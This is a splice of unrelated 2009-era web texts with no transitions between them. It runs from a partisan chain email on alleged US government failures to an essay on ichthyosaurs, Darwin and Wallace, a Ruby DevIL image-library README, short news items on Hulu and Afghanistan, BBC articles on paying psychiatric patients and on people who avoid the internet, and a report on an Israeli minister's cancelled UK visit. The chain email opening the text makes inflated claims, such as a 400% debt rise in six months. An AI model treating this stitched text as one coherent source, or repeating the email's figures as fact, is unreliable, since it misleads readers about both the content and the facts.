Together Fannie and Freddie have now led the entire world into the worst economic collapse in 80 years .
The War on Poverty was started in 1964 – they ’ve had 45 years to get it right ; $ 1 trillion of our hard earned money is confiscated each year and transferred to “ the poor ” ; it has n’t worked .
Medicare and Medicaid were established in 1965 – they ’ve had 44 years to get it right ; they are both broke ; and now our government dares to mention them as models for all US health care .
AMTRAK was established in 1970 – they ’ve had 39 years to get it right ; last year they bailed it out as it continues to run at a loss !
This year , a trillion dollars was committed in the massive political payoff called the Stimulus Bill of 2009 ; it shows NO sign of working ; it ’s been used to increase the size of governments across America , and raise government salaries while the rest of us suffer from economic hardships .
It has yet to create a single new private sector job .
Our national debt projections ( approaching $ 10 trillion ) have increased 400 % in the last six months .
“ Cash for Clunkers ” was established in 2009 and went broke in 2009 – after 80 % of the cars purchased turned out to be produced by foreign companies , and dealers nationwide are buried under bureaucratic paperwork demanded by a government that is not yet paying them what was promised .
So with a perfect 100 % failure rate and a record that proves that each and every “ service ” shoved down our throats by an over - reaching government turns into disaster , how could any informed American trust our government to run or even set policies for America ’s health care system – – 17 % of our economy ?
Maybe each of us has a personal responsibility to let others in on this brilliant record …
via GSC
Ichthyosaurs ( there were many types ) were streamlined creatures with long snouts , large eyes , and a powerful tail .
Later fossils would show that they had a large dorsal fin on their back .
They sped through the seas of the Jurassic ( and Triassic , and Cretaceous ) racing after fish and shellfish .
If one were to pop up off the Dorset shore today , observers on land might well believe that they were watching a dolphin as the animal dashed and jumped among the waves .
But Ichthyosaurs were not related to dolphins .
They were reptiles , members of a family that originated from lizard - like ancestors instead of the land - dwelling mammals that produced dolphins and whales .
The reason that Ichthyosaurs look much like dolphins is because both are performing the same role in a similar environment .
Both are predators that hunt their prey in the ocean .
The large eyes come because sea water is clear and sight is an important aspect of tracking and capturing fast - moving fish in shallow water ( those few species of dolphins that live in the muddy waters of rivers are either nearly or completely blind ) .
The long snout filled with banks of sharp , narrow teeth is an excellent mechanism for catching fish .
Most of all , both had the same major problem — moving quickly and efficiently through water .
The ease with which an object can move through a medium like air or water is measured by looking at the drag coefficient .
A high drag coefficient means that an object is not very efficient at moving through the medium , and will need to expend more energy .
A person walking in air has a drag of about 1.2 ( which is not particularly good ) .
Older cars have drag coefficients as high as 0.7 .
The Toyota Prius and the Honda Insight both have drag coefficient below 0.3 .
That 's not bad .
The most streamlined supersonic aircraft manage a drag less than 0.02 — they give up only about one fifteenth as much energy to pushing aside the air as even a highly efficient car .
But water is 830 times as dense as air , so the penalty for a water - going creature that is n't shaped to avoid drag is 830 times higher .
The drag coefficient for dolphins is less than 0.004 — much better than the sleekest aircraft .
Ichthyosaurs looked a lot like dolphins because dolphins are a pretty good design for moving in water .
Both animals were refined by the same powerful forces : the need to defeat drag ... and the idea first fully realized by Charles Darwin and Alfred Russell Wallace .
Two types of organisms moving toward similar solutions to the same problem , despite having very different origins , is a common feature of the fossil record ( and of the living world around us ) .
Bats and pterosaurs had very different ancestors , but made some of the same adaptations to flying .
Marsupial animals in Australia developed many of the same solutions to existence as their placental relatives in the rest of the world , leading to informal designations of some Australian natives as the " marsupial mouse " or " marsupial cat " or " marsupial wolf . "
Both creatures and consumer products adapt to an " environment . "
For the first it can be something as simple as the medium through which they move , but it's also the food they search for , the predators that hunt them , the temperature of the water , the chemistry of the air , their competitors , their diseases — everything around them .
Likewise , products exist in an environment that includes consumers , competitors , retail markets , economic conditions , resource availability , and items as ephemeral as " style . "
Ideas also form in an environment .
They require a foundation of previous ideas , the availability of raw information , and a society that supports new thinking .
In 1684 , German mathematician Gottfried Leibniz published the first paper based on calculus , which he had invented over the previous decade .
Meanwhile Isaac Newton did n't publish his first work of calculus until 1693 , but said he had been working on his version since 1666 .
For three centuries , adherents of both men have argued over who really invented calculus , but there 's no reason to believe the answer is n't both .
On the technological front , the list of near simultaneous discoveries is lengthy .
Was the first practical electric light bulb invented by Thomas Edison , or Joseph Swan ?
Did Alexander
Bell invent the telephone , or was it Elisha Gray ?
The radio , the television , and the MRI imager all have multiple claimants to the title of " inventor of . "
Even when it comes to relativity , there are several others who anticipated at least some part of what Einstein would so brilliantly assemble .
When Charles Darwin opened a note from Alfred Russell Wallace in the spring of 1858 and found that Wallace had deduced the same ideas on natural selection that Darwin had been thinking over since 1837 , it was n't too surprising .
Both men had been inspired by reading the Reverend Thomas Malthus , whose 1798 essay fretted over the possibility of the human population outracing its food supply .
The power of population is indefinitely greater than the power in the earth to produce subsistence for man .
Population , when unchecked , increases in a geometrical ratio .
Subsistence increases only in an arithmetical ratio .
A slight acquaintance with numbers will show the immensity of the first power in comparison with the second .
Malthus limited his speculations to man , but both Darwin and Wallace began to think about what the limits of population meant for other species .
If any creature expanded its population generation by generation , it must inevitably run into limits .
Limits on food .
Limits on space .
Limits on the proper kind of habitat .
In fact , most creatures must be at that limit all the time , with the environment supporting as many as possible .
Both Darwin and Wallace knew that there were differences between individuals .
That was clear in the observations of animals and plants they had made on their travels .
It was equally obvious from the domestic animals they saw all around them .
Thinking of Victorian England today , the idea that the streets of London were full of horses seems odd — and somewhat charming .
But those streets were also full of sheep , goats , cows , chickens , and other animals .
With no refrigeration , thousands of animals were slaughtered every day throughout the city .
Cages of birds , pens of animals , rooms of houses turned into makeshift stockyards , slaughterhouses and butcher shops where blood ran into gutters were also standard features of most London neighborhoods .
Which seems a good deal less charming .
Even people who did n't live on farms were constantly exposed to domesticated animals of all types .
Which is a large part of why both Darwin and Wallace made extensive use of domesticated animals as examples in their work .
And that 's all the ingredients there are for natural selection .
Limits on population put a pressure on which organisms hang around and reproduce .
Not all organisms of the same species are identical .
Those that live , love , and have offspring , tend to pass their traits to the next generation .
Populations of organisms can , and do , contain many variations all the time .
Often the variations they carry do n't have any effect on their ability to produce offspring .
Is a blue - eyed wolf more likely to have pups than a grey - eyed wolf ?
Only if the wolf 's potential partners have a thing for a certain eye color .
When conditions are good , many traits have such a minimal effect on reproduction that they linger in the populace .
What does it matter if you 're able to skate by on less food when food is abundant ?
Until it 's not .
A change in any aspect of the environment can suddenly turn what had been just another variant into either an advantage or a detriment .
Being able to survive on less water might not be valued , until there 's a prolonged drought .
Tolerating heat or cold better than your neighbors might have no value , until extreme conditions strike .
Being the fastest rabbit in the area might not matter , until faster foxes arrive .
Big can be big when there 's plenty of food , until shortages turn small into an edge .
There are differences among individuals .
Some of those differences tend to be inherited by the offspring produced by those individuals .
If there is a selective pressure that acts against those differences , you get evolution .
The end .
In any given generation , the differences may be small .
The edge given to one variant over another can be razor thin .
Still , evolution moves on , aided by that secret ingredient spelled out by James Hutton — deep time .
The simplicity of the idea is part of what made it hard for some people to accept .
There were scientists among Darwin 's immediate circle of friends who knew that evolution had happened , but who thought Darwin 's mechanism was just not sufficient .
There had to be more to it .
Over the next sixty years , natural selection would come in and out of favor as the driving system behind evolution , and that bald simplicity would be one of the biggest problems .
Even in Darwin 's time , his most vocal opponents were not those who did n't believe that evolution had taken place , it was those — like anatomist Richard Owen , who had worked with Darwin on specimens returned from the Beagle — who did n't believe that Darwin 's simple process could be responsible for all the variety in the world .
However , this simplicity was also one of the theory 's biggest assets .
Once explained -- and Darwin couched the idea expertly , with many examples and answers to the questions he anticipated from opponents -- there was a forehead smack heard round the world .
Many who had been followers of some earlier system , or doubters of evolution altogether , saw the unmistakable nature of the idea and became vocal supporters .
Thomas Huxley 's reaction was probably typical of many who read On the Origin of Species when it reached the stands in 1859 .
" How extremely stupid not to have thought of that ! " -- Thomas Huxley
Huxley could have thought of it .
So could any one of hundreds of naturalists who had backgrounds , experience , and information similar to that held by Darwin and Wallace .
The many examples of animals and plants that Wallace had cataloged in his Malaysian wanderings and Darwin had seen in his shipboard travels , gave them both an important nudge toward thoughts of natural selection .
But others had seen as much and done as much .
Certainly men like Huxley , who had also been part of a round - the - world scientific voyage and had access to the same data that Darwin had used , or men like Owen , who had examined and cataloged tens of thousands of creatures both fossil and living , could have come up with the same idea .
That they did n't only shows how hard simple things can be .
Natural selection looks simple , and it is simple , but out of that simplicity endless complexity can be generated .
Looking at the world , most scientists ( and non-scientists ) saw only the complexity .
The living world was so massive , so intricately interwoven , so complex , that people looked for massive , intricate , complex answers .
The real insight that Darwin and Wallace shared was that complexity could spring from simplicity .
There was no need to go looking for a complex solution .
There was no need for divine intervention at the appearance of every species , and no need for a mechanism that propelled the world toward some hidden plan .
In fact , for all their apparent similarities , Darwin and Wallace reached their similar conclusions from different directions .
Darwin , despite originating an idea that 's the most powerful in all of science , was something of a conservative thinker .
The words of his textbooks and professors put him on a path where he gradually , almost tentatively , moved toward the idea of natural selection , and then spent decades expanding , testing , and validating his thoughts .
Wallace was the real radical , a man who welcomed odd thoughts and unorthodox notions .
Wallace would go on to not only elaborate on natural selection , but also to note that many animals employed " warning colors " to announce that they carried poison or some similar threat .
He would be the father of biogeography , doing much more than Darwin to explain and establish the distribution of plants and animals .
He would also be a spiritualist who attended seances and supported channelers .
Wallace was something of a scientific James Dean — if there was a traditional thought , he had a rebellion .
Both men were brilliant .
Both were capable of highly original thinking .
But Darwin was persistent , dogged , and obsessive when it came to working out every implication of an issue .
Wallace was more mercurial , always ready to tackle something new .
The two men came together on natural selection because they were driven there by the data .
Once glimpsed , the idea of natural selection was as powerful and necessary for them both as the streamlined bodies of the dolphin and the ichthyosaur .
Some ideas are so compelling that they shape the direction of the whole world .
Some people are equally compelling .
A decade before Wallace 's letter arrived in Darwin 's mailbox , the Geologic Society realized that they had to do something to recognize one of the most important paleontologists in the nation — Mary Anning .
The woman who had started by selling fossils to support her family had continued at the work all her life .
The beautiful specimens she recovered , among the most complete ever found , provided additional proof of extinction and showed how different the seas of the Jurassic had been .
She had uncovered not only the ichthyosaur , but multiple forms of the long - necked plesiosaurs , extinct fish , crocodiles , and even a beautiful pterosaur that had been unlucky enough to plunge into the ancient sea .
Anning sold her discoveries to the men like Richard Owen who described them and gained fame in the process , but Mary was never more than a step away from poverty .
Still , the importance of what Anning had done and the dedication with which she pulled out one complete skeleton after another won her admiration among the men who were rewriting science .
In 1847 the Geological Society was , like all such societies at the time , restricted to men only , but by overwhelming vote they made Mary Anning an honorary member .
Only a few months later she died of breast cancer at the age of 47 .
On her death , a stained glass window as erected in the church of St. Michael the Archangel .
The inscription on the window read " This window is sacred to the memory of Mary Anning of this paris , who died 9 March 1847 and is erected by the vicar and some members of the Geological Society of London in commemoration of her usefulness in furthering the science of geology , and her benevolence of heart and integrity of life . "
The window shows how valued Anning 's contributions were , but there 's another remembrance of Mary Anning that 's perhaps an even better claim to fame — though it 's not quite " parallel " to a stained glass window .
Mary Anning , the child who sold fossils on the beaches of Dorset to save her impoverished family , is said to be the inspiration behind the old tongue - twister " She sells sea shells by the sea shore . "
DevIL is a fast and lightweight image library that supports the loading and saving of images in almost any format .
It also provides some basic image manipulation functionality .
Features :
Loading and saving of images .
Thumbnailing and scaling .
Rotations , cropping , composites , gamma correction , image sharpening , blurring , etc .
Interoperability with the Gosu game development framework .
Example Code :
Devil.with_image ( " horse.png " ) do |img| img.thumbnail2(150 ) img.gamma_correct( 1.6 ) img.rotate ( 45 ) img.save ( " horse_thumb45.jpg " )
end
Note that the Ruby Devil implementation also supports the traditional DevIL API for greater control ( though extra fiddliness ) :
IL.Init name = IL.GenImages ( 1 ) [ 0 ] IL.BindImage ( name ) IL.LoadImage ( " horse.png " )
ILU.ImageParameter (ILU ::FILTER , ILU ::SCALE_BSPLINE ) ILU .
Scale ( 100 , 100 , 1 ) IL .
Enable(IL::FILE_OVERWRITE ) IL.SaveImage ( " horse_scale.png " )
Requirements :
Installation :
Ubuntu / Debian systems :
aptitude install libdevil1c2 libdevil - dev
Gentoo systems :
emerge “ media-libs/devil ”
Macosx systems :
sudo port install libdevil
Windows systems :
download devil - dlls.zip from http://github.com/banister/devil/downloads
and copy the uncompressed files to c:\ruby\bin\
For other systems :
locate and install libdevil and libdevil - dev using your package manager
OR download and compile the sourcecode from http://openil.sourceforge.net
Installing The Gem :
After setting up the DevIL library ( as described above ) you need to install the Ruby Devil gem :
gem install devil
Gosu Compatibility :
If you wish to use Devil with the Gosu game development library you will also need the following gems :
Gosu ( gem install gosu )
TexPlay ( gem install texplay )
ruby - opengl ( gem install ruby - opengl )
Devil augments the Gosu library in a few ways .
It lets you load image files in multiple formats ( Gosu itself is restricted to png and bmp ) .
It lets you * save * Gosu : : Image objects to files ( only useful if the images have first been manipulated using TexPlay ) .
Devil also provides a ‘ screenshot ’ method to the Gosu : : Window object enabling you to take screenshots of your gameplay and save it to a file .
Note that if you combine the use of Devil with TexPlay you get a fairly complete image manipulation framework .
TexPlay enhances the basic functionality of Devil , providing the ability to draw lines , circles , rectangles , bezier curves , polygons , composites , turtle graphics , l-systems and more .
See TexPlay for more information .
Rdoc :
Reasonably comprehensive documentation for the high - level Devil wrapper ( not the low - level API ) can be found here : http://rdoc.info/projects/banister/devil
Credits :
This Ruby Devil gem is heavily based on the ruby - devil project started by Jaroslaw Tworek but abandoned in 2006 .
Some elements of the Devil API are based on the image_science project by seattlerb .
Project Page :
The github project can be found here : http://github.com/banister/devil
If you have any problems please file an issue on that page .
Devil is a relatively new project and there may be some minor ( or even major 🙂 ) bugs still present .
Share this : Twitter
Facebook
Reddit
Like this : Like Loading ...
Related
At an industry summit in NYC on Oct. 21 , News Corp Deputy Chairman Chase Carey revealed that online video hub Hulu will begin charging users for content as soon as 2010 , according to Broadcasting and Cable .
Carey told reporters that a subscription system is likely , although some content will probably continue to be offered free of charge .
“ I think a free model is a very difficult way to capture the value of our content .
I think what we need to do is deliver that content to consumers in a way where they will appreciate the value , ” he said .
Russia Today
Wednesday , Sept 16th , 2009
Former KGB Special Forces Colonel Oleg Balashov , who took part in the Soviet military campaign in Afghanistan , told RT he doubts more U.S. soldiers will increase the chances of victory .
This comment comes as the U.S. troop numbers in Afghanistan have doubled over the last year while the U.S. Chairman of the Joint Chiefs of Staff , Admiral Michael Mullen , admitted that even more are going to be needed to defeat the Taliban .
“ This war will be the same as it was in Vietnam and as the Soviet Union had in Afghanistan back in the 1980s , ” said Balashov .
Afghanistan “ wo n’t let them succeed , you ca n’t do this to the people in this country .
The Afghan population has reacted to this war as expected . ”
“ The Soviet troops used more human resources in the war , ” he added .
“ The Americans are employing air attacks and in this case the number of civilian casualties is much higher . ”
By Michelle Roberts
Health reporter , BBC News
Financial incentive or coercion ?
UK doctors are resorting to paying some psychiatric patients in the hope it will make them take their medication .
As a trial , 68 patients with bipolar disorder or schizophrenia will get £ 15 for every jab of anti-psychotic drug , earning them a possible £ 720 in a year .
A team at Queen Mary , University of London , hopes to encourage " difficult " patients to comply with treatment .
But Mental health charity Mind said people should be taking medication for the health benefits not for the money .
Non-adherence with medication is a big problem and increases relapse risk and NHS costs .
Experts believe a third of patients with schizophrenia fail to comply with their prescribed medication .
We decided on the £ 15 sum because it is a relatively small amount of money .
It is an incentive
Professor Priebe Missing as few as one to 10 days of oral anti-psychotic therapy nearly doubles the risk of a patient being admitted to hospital , they say .
To avoid this , doctors often prescribe depot treatments - injectible versions of the pills - but this is not fail - safe and patients may simply not turn up for their jabs .
Reminder phone calls and texts may fall on deaf ears .
When all other attempts to achieve adherence have failed , bribery may be an option , according to Professor Stefan Priebe , who led the Queen Mary team .
He expects that not only will patients be happy to trade an injection for cash , but that the " money for medication " scheme should pay for itself , with the financial costs more than off - set by the savings made in reduced hospital admissions .
The idea is not entirely new - cash , free public transport passes and even food hampers have been used in Russia to entice TB patients to take their medicine .
' Incentive ' And Australian researchers found take - up of child immunisations increased from 6 % to 23 % when parents were offered a lottery ticket with the potential to win a small cash reward .
In the UK , the National Institute for Health and Clinical Excellence recently published draft guidance on drug addiction , advocating paying drug users to comply with drug cessation programmes .
Professor Priebe 's trial includes 136 patients diagnosed with either schizophrenia or bipolar disorder who all have a very poor track record for taking their medication .
Over the 12 months of the study , only half of the patients will be offered the " £ 15 - per- jab " incentive , and all will continue to receive their usual care .
The option of being paid to take a drug treatment could unduly influence people 's decision - making over whether the treatment is right for them
Alison Cobb of Mind But Professor Priebe recognises the work raises ethical issues .
He said : " We had to seek ethical approval and interviewed 25 focus groups of stake holders .
We decided on the £ 15 sum because it is a relatively small amount of money .
It is an incentive .
" You do not want people to become dependent on the money .
Also , if we had gone above £ 20 a week , it would affect people 's entitlements to welfare benefits , and many of the patients will be on these . "
He has capped the number of " paid " injections at four per month .
Another consideration is whether compliant patients will demand the same money or become poorly adherent in order to be eligible for the scheme .
The mental health charity Mind is worried cash incentives run counter to informed decision - making , coercing patients for pure financial gain .
Spokeswoman Alison Cobb said : " Depot injections are usually given to people with enduring mental health problems who may already be on limited incomes , and the option of being paid to take a drug treatment could unduly influence people 's decision - making over whether the treatment is right for them .
" Psychiatric drugs are known to have unpleasant side - effects , and people should take medication because the health benefits outweigh the drawbacks , not because they need the money . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The world of internet " have - nots " is not just populated by people who can't go online .
Chris Bowlby finds there are many who simply wo n't .
If you 're reading this , you 're part of the internet using majority .
But it 's not nearly as much of an overwhelming majority as many assume .
It 's estimated that as many as 17 million people in Britain aged over 15 are not using the internet .
Ellen Helsper says non-users are becoming ever more militant
As a report , released on Thursday , says spending on information technology is more important to Britons than anything except food , there are many who are staying firmly beyond the grasps of the net .
And , in a worrying trend for those planning a " digital revolution " in public services , the rate at which people are becoming new users is slowing .
Non-users are " becoming less and less likely to want to be engaging with technology such as the internet , " says Ellen Helsper , who has been a leading researcher with the Oxford Internet Institute .
There is a rise in the number of people saying they are just not interested in being online , " it 's not that relevant to my life , I do n't see how I would fit it in " .
So the internet refuseniks seem to be , in many cases , very determined .
But given the sheer wealth of information that can be accessed through a few mouse clicks and keystrokes , why would anyone consciously choose to avoid the online world ?
At University of Dundee I meet researchers whose job it is to understand why so many people are shunning the net .
Their subjects are mostly over 50s and several say net use would leave them less or no time for activities they value highly .
" I know a lot of friends , they 're hooked on the damn thing " says one woman .
She knew a " marvellous artist " who had abandoned her art in order to spend time computing .
Impersonal " It 's destroyed a lot of family life " complains another , as hobbies are no longer enjoyed communally .
FIND OUT MORE ...
Ca n't Connect Wo n't Connect is on BBC Radio 4 on Friday , 7 August at 1100 BST
Or listen to it later on the iPlayer
Technology ' priority for Britons '
Others lament the loss of personal communication .
" We tried computing and we 're back to writing letters " says one of those being questioned by researcher , as e-mail is seen as too impersonal for close human contact .
" My wife wo n't send e- mail " one man says .
" She likes the personal touch [ so ] does n't know what 's happening to that letter of yours [ if it is sent electronically ] . "
Privacy is another worry , as computers have made information gathering so powerful .
" The whole world 's on computers " , says one woman .
" You just have to say your postcode and they know everything about you .
I 'm just not interested . "
" If you hit the wrong key , " says her neighbour , " what about privacy ? "
And hitting the wrong key took us into complaints about design and computer complexity .
" I 'm bad with fingers , that 's why I make mistakes " one woman tells me .
" Computers are like a Rubik 's cube , " a former teacher says .
" Once you start to make a mess , and you do n't know what you 're doing , all you do is make a bigger mess . "
Curtains down Alan Newell , professor at the Dundee university school of computing , points out the typical computer tends " to be designed by young male computer scientists and they tend not to understand the challenges it provides for groups of people they never meet " .
Prof Alan Newell : ' Computers tend to be designed by young males '
While the sheer amount of information online is what draws many to immerse themselves in the net , the same fact also deters some .
" You get so much junk you have to clear out " one confirmed non-user complains .
" I just do n't feel I 'm going to get any pleasure out of it " , says another in the group .
But what 's the harm in opting out of everything online ?
There is growing anxiety that those who choose to remain offline will pay a price .
One woman living in sheltered housing had noticed all the discounts being given to those paying electronically .
She speaks of a " curtain coming down " between those who were and were not online .
It 's a problem all over the country .
At a community centre run by the Lighthouse project at Rowley Regis in the Midlands , Tina and Brian Whitehouse are working hard at their computer skills after both losing jobs in the recession .
" A lot of the jobs now , you can only apply online " says Tina , " so if you do n't know the basics of a computer , how can you apply online ? "
This centre 's work shows how the millions not online are far from confined to older people .
" You'd be amazed at the amount of people of all ages who come here with no computer experience " says John Payne , who works at the centre .
Forcing a switch
He is in late 20s and only recently took up computing and using the internet as his parents could not afford to be online at home .
Even those who can afford computers , he adds , often let them gather dust as they are fearful of damaging them and lack the training and support to become regular users .
With the current pressure on public spending government wants to move more and more services online , arguing that services can both be improved and cost less to deliver .
You can't be a proper citizen of our society in the future if you are not online
Martha Lane - Fox
But if many millions remain offline , savings will be harder to make , and political controversy will grow if government tries to force people to switch by offering more and more limited alternatives - especially in areas such as health care .
Martha Lane
Fox , dotcom pioneer and now appointed as the government 's digital inclusion champion , is convinced of the internet 's benefits for all .
" I do n't think you can be a proper citizen of our society in the future if you are not engaged online , " she says .
But she worries too , she told me , about the refuseniks ' attitudes becoming " too prevalent " .
So those who find life without the internet unimaginable , and those who still are n't convinced , must find better ways of understanding each other - provided , that is , they can ever agree on how to communicate .
Here is a selection of your comments .
Hear hear !
I 'm 36 , and have internet access at home but never use it .
I spend my working life using a computer and have to use the internet for work purposes , the last thing I want to do when I get home is sit in front of another computer !
I 've been asked by friends to join networking sites but I 'm just not interested .
If you want to speak to me , I have a telephone !
Rebecca , Leicester , UK I can understand people not wanting to go online .
I do n't have a computer at home .
I know I would waste hours and get addicted to probably not very life - enhancing activities .
I 'm lucky I can use my work computer for buying plane tickets etc .
Many , not just the old , want to keep life simple .
At most one credit card .
One debit card .
One pin number .
No passwords .
I 've never had a mobile phone and I prefer small supermarkets to large because there is less choice .
I cancelled my SKY so now I 've only got four channels , which is too many .
I do n't think the human brain was intended to be stuffed with lots of different nonsense .
We are probably wired up to successfully hunt one animal or make a good job of carving a log into a God shape .
Jon , Manchester
My elderly mother threw out her computer when , after composing a long and important Email it glibly announced that it was going to shut down for important updates - updates to the MP3 player .
John B , Clitheroe
While I do n't know how I survived B.I. ( Before Internet ) , there are many who manage perfectly well without it .
The author should not assume that these people are resisting as if it is some kind of war , they simply do n't feel the need to connect or can't afford it .
There is a group who use the internet for basic web - browsing and e-mail some of whom have low incomes and it is grossly unfair to ask that they and non-users subsidise nationwide broadband installation by paying a telephone tax so that big , wealthy families with multiple computers can watch movies , play games and video - chat all at the same time .
John , London
For years the children have been required to do homework which is set on line which has made me angry as a being a single parent for 12 years - what 's wrong with a pen and book ?
My new stepdaughter , 13 years old , who comes to visit every other week has her work online and has to reference the internet now .
With routers , printers , remote access I have become the IT administrator as one of my many jobs !
My new husband gets his work sent via email and looking for work or applying for jobs especially with the NHS just wont accept the fact you are not online .
I am grateful that if we can afford a holiday we can leave this behind along with mobile phones , the stress and agitation when the modem or the network is n't working is pure hell .
It has destroyed family life and it has cost a small fortune over the years along with broadband subscriptions .
I do wish that you had an option or choice if you wanted to be linked by this umbilical cord to the www but unfortunately it seems we have to or face being labeled ' strange ' or ' old ' or ' technophobe ' for not being part of it all .
Helen Stanton , Bedford I work as a web designer , but I find the idea that any particular piece of technology should be compulsory is a bit dictatorial .
To not have a mobile phone is almost unthinkable , and we treat those without them with suspicion , but we all got ok before they became commonplace .
Likewise the internet , which often just mimics and simplifies tasks performed by the postal service , say , or a reference library .
It 's great , but it is n't really necessary .
To force people to apply for jobs online will alienate some of the most deprived people from the job market and obviously reduce social mobility .
Paul Stevens , Manchester I entirely agree with Martha Lane - Fox .
These Luddite refuseniks should be compelled to become proper 21st Century citizens .
The government must show the will to drive this through , regardless of sensitivities .
I mean , who do they think they are ?
Free - willed people living in a democracy ?
Arnie , Wolverhampton " ' I do n't think you can be a proper citizen of our society in the future if you are not engaged online . "
I find this a bit insulting .
My parents are in their 60s - they do n't have a computer or the internet .
If they need to sort something out , they either write a letter or make a telephone call - simple .
A bit old - fashioned in some people 's eyes , but it gets a result .
They are happy to live their lives internet free , so why the pressure ?
Let them be .
Becky , Manchester How arrogant of Martha Lane - Fox !
Who is she to say who will or will not be a " proper citizen of our society " ?
Bruno Wilson , Banbury I remember at school reading a short story called ' The Machine Stops ' .
It was set in the future at an imagined time when everything a person needed to survive was literally brought to them via a computer ( the machine ) which controlled all services and communication .
When the machine stopped the isolated individuals no longer had the necessary knowledge of how to go about providing for themselves or how to communicate with other people directly ; they did not know how to use tools other than buttons or switches and where very unfit because of having had every thing brought to them .
So I suggest we insist that people continue to learn all the things necessary to survive without computers .
They use electricity , for example .
If there was a stoppage for any reason that that could not be fixed quickly and people were dependent on their computers with no alternatives or batteries it seems obvious they would be in dire straits .
At least let us make sure that children and any one in education learns how to grow vegetables , for example , along side their computer training .
Heather Lyon , Lincoln , UK I am a 21 - year - old male , and cannot stand using computers , or the internet .
This is not through lack of knowledge on the subject , on the contrary , I am an IT Consultant for IBM .
I am currently at this job as it was the only one I could find at the time of searching , and as most people of my generation , I was lucky enough to have basic computing skills taught to me at school .
However , before I began this job , and now as well when I am not at work , I shun computers and the internet almost entirely .
I believe that can have many detrimental effects on our lives , including loss of social interaction , loss of physical activity , and a loss of ability to read and think deeply .
I am aware of the benefits of the internet , and it 's mind boggling array of information , but I still would prefer to go to a library and read a book .
After all , is that not what we used to do , and we were getting along fine without it were we not ?
Rob Coltman , Partridge Green , England So , Martha Lane Fox , appointed as the government 's digital inclusion champion , says " I do n't think you can be a proper citizen of our society in the future if you are not engaged online " .
If people choose not to " engage online " , it 's their choice and they should not be penalised in any way for it .
they have as much right to expect proper provision of services as those who do use computers .
Mum of Two , England
So if you are not online , you can stay unemployed .
It 's a sad state of affairs that has left the majority of the population shut out .
Even as a doctor you cannot now apply the old fashioned way with a CV and some references .
The only problem is that if the electricity supply goes , so does all the online and internet .
Rohen Kapur , London UK
We work with computers and we have one customer who will be 93 this summer and he uses his computer for online banking and booking holidays abroad .
He also keeps in touch with family by email .
We also had another customer who was 88 who had his own website , and he found computers and the information that you could get through the internet fascinating .
So lots of older people do love their machines .
Malacandra , Field of Arbol I have trouble explaining how to use DVDs to my mother ( 76 ) and the clock on her video recorder is never right , unless I visit and re-set it .
I wish she was available by email , but I know that even though I would happily buy all the equipment for her , it just is n't going to happen .
Not least because , apart from not being good with technology , she believes the internet to be full of porn and criminals .
Using computers is not as simple as understanding how to send and receive email .
As we all know , occasionally unexpected things happen .
I use the internet a lot but even I do n't want to use it for everything .
It MUST remain possible to live life without it , especially while the older generation are still with us .
A Keys , Brigg , N Lincs
The internet / computing is going to become a skill like reading .
When mass education came in there were parents who could n't read and did n't see the need to learn as they were happy with how their lives ran ( or just resisted change ) .
In a generation 's time the internet will have 99 % + usage .
Martin , Guildford
With over 200 spam a day , I sometimes envy those not online .
Furthermore , how will the technoholics survive when their systems go down ?
How then will they manage their shopping and banking ?
I use my computer as little as possible so that I can maintain a healthy quality of life .
Adrian , Farnborough , UK
How will these " refuseniks " comply with the upcoming , mandatory , on - line tax return filing ?
Peter Ridgley , Leicester UK
I could see the power of a computer way back in the early 1980s , when just turning on computer equipment in the right order was a work of art , and programs had to be written by oneself on a conveniently provided BASIC interpreter .
I was hooked and since then have seen the computer progressively de-skilled , until at present little knowledge is required to operate one or to get on the Internet .
Conversely I have seen the Internet get progressively more dangerous from hackers and spammers who appear to have received an unconditional pardon from the powers that be , and even their own computers are full of worms and viruses .
Hackers appear to have unrestrained access to the internet .
Only this week I have had two intrusion attempts to wreck my computer that were caught by my security software .
Computers are wonderful innovation that even the originators could not have envisaged , but which have been criminally allowed to be polluted with all the wrong things while our respected leaders throw up their hands and say , " We can do nothing . "
Kevin , Burnley I have every sympathy for those people who , for one reason or another , have n't had the opportunity to learn to use a computer .
They should be given help to learn .
But people actually refusing to go online ?
Tough luck if they miss out on discounts and opportunities .
It 's their choice , and I see no reason why the rest of us should be held back or made to bend over backwards to accommodate these Luddites .
Christy Andersen , Newcastle , UK I was a latecomer to the virtues of the internet myself and was constantly struck by how unhelpful all the supposed sources of help were .
Everything happened too quickly .
Communication was constantly reduced to smaller and smaller abbreviations , and thus less and less intelligible .
It was a bit like being struck on a traffic island in the midst of endless hellish surges of vehicles .
If Martha Lane
Fox is really serious about getting everyone on the internet she needs to think about creating a babynet , a sort of kiddy - level paddling pool where people are allowed to communicate with each other using such olde worlde terminology as " Dear Sir " and " yours sincerely " , etc. , operate at precisely the speeds they 're comfortable with , and where they do n't yet have to duck and dive all the sharks out there with their endlessly varying , highly disguised , personal , political and economic agendas .
Aborkwood , Liverpool , UK More and more I am becoming disturbed by the attitudes of articles written about people that choose not to use the Internet .
Reading between the lines , these people are assumed to be " backward " , " old stick - in - the - muds " or " refuseniks " .
For crying out loud , what on earth is wrong with not using the Internet ?
It is a tool that can be used for achieving certain things and for some things it is certainly useful .
However , if you do n't need it , you do n't need it .
We do not condemn people as " refuseniks " for not driving a car , for being vegetarians , for living together out of marriage .
What is the big deal ?
Ralph Little , Vancouver , Canada
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Mr Yaalon was military chief of staff at the time of the Shehadeh attack Israeli minister and former military chief Moshe Yaalon cancelled a UK visit because of fears of arrest for alleged war crimes , his office says .
Pro-Palestinian groups in Britain want Mr Yaalon to face trial over the 2002 killing of a Gaza militant , in which 14 others also died .
Mr Yaalon took legal advice and wanted " to avoid playing into the hands of anti-Israel propaganda " , an aide said .
A similar attempt last week failed to get Israel 's defence minister arrested .
Mr Yaalon , who is vice prime minister and strategic affairs minister , had been invited to attend a charity dinner held by the Jewish National Fund 's UK branch .
But his spokesman , Alon Ofek - Arnon , confirmed that the foreign ministry 's legal team had advised against it .
Israeli media reported that the advisers believed Mr Yaalon would not be accorded diplomatic immunity - in contrast to Defence Minister Ehud Barak who visited the Labour Party Conference in Brighton without interference .
" This is a campaign whose goal is to de-legitimise the state , " Mr Yaalon said in remarks quoted by Haaretz newspaper .
Allegations against Mr Yaalon date back to July 2002 , when an Israel Air force jet dropped a one - tonne bomb in a densely populated area of Gaza to assassinate senior Hamas figure Salah Shehada .
